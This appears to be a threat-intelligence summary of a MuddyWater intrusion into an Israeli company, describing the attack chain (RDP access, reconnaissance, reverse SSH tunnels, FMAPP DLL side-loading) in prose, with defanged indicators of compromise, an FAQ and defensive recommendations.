MuddyWater APT Intrusion Analysis: SSH Tunnels and Malicious FMAPP DLLs
- Actor Motivations: Espionage
- Attack Vectors: Backdoor,Malware
- Attack Complexity: Medium
- Threat Risk: Unknown
Threat Overview
Huntress researchers have detailed a complete attack chain attributed to the Iranian-linked APT MuddyWater, targeting an Israeli company. The intrusion began with initial access via an RDP login, followed by extensive interactive network and Active Directory reconnaissance. The threat actor demonstrated hands-on-keyboard activity, evidenced by typographical errors during command execution. To establish persistent access and bypass network controls, the attackers utilized the native Windows OpenSSH client to create reverse SSH tunnels. Subsequently, they deployed a malicious payload via DLL side-loading, leveraging the legitimate Fortemedia application (FMAPP.exe) to execute a malicious DLL (FMAPP.dll) for command-and-control communications.
Detected Targets
| Type | Description | Confidence |
|---|---|---|
| Region | Israel | Verified |
Extracted IOCs
- 589ecb0bb31adc6101b9e545a4e5e07ae2e97d464b0a62242a498e613a7740b6
- 157[.]20.182.49
- 162[.]0.230.185
- 173[.]16.10.1
Tip: 4 related IOCs (3 IP, 0 domain, 0 URL, 0 email, 1 file hash) to this threat have been found.
Overlaps
Source: Group IB - February 2026
Detection (one case): 162[.]0.230.185
Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.
FAQs
Demystifying the MuddyWater Cyber Intrusion
An unauthorized user breached a company's computer system by logging in remotely. Once inside, they explored the network, mapped out administrative accounts, and planted a hidden program to communicate secretly with their own external servers.
Cybersecurity researchers attribute this attack to MuddyWater. MuddyWater is an Advanced Persistent Threat (APT) group that threat intelligence analysts have linked to Iranian interests.
The attack was a hands-on, interactive intrusion where the attacker manually explored the system to understand the network layout and administrative controls. By setting up hidden communication channels and a backdoor, their goal was to establish a quiet, persistent foothold for likely espionage or further network compromise.
This specific report details an isolated intrusion into a single customer's environment. However, the attacker utilized network infrastructure and IP addresses that are known to be part of a broader, documented cyber campaign.
The victim in this incident was an Israeli company. During the attack, the threat actors specifically searched for and targeted high-level employee accounts, such as IT Administrators and Domain Admins, to gain wider control.
The attackers first logged into the victim's computer using standard remote desktop software. They then used built-in computer tools to look around and tricked a legitimate, safe software program into loading their malicious code, allowing them to bypass security alarms.
An Israeli company may be highly attractive to this group due to geopolitical motives aligned with their Iranian ties. Furthermore, securing administrative accounts within the company makes it a valuable target, as it grants attackers broad control over sensitive corporate data.
Organizations should strictly secure and monitor their remote desktop connections to prevent unauthorized access. They should also use modern security tools to detect unusual programs running from public folders and block unapproved outbound network traffic.
While the cyber infrastructure used by MuddyWater is part of a larger, ongoing threat campaign, this particular event was a highly targeted, manual attack directed specifically at the Israeli company in question.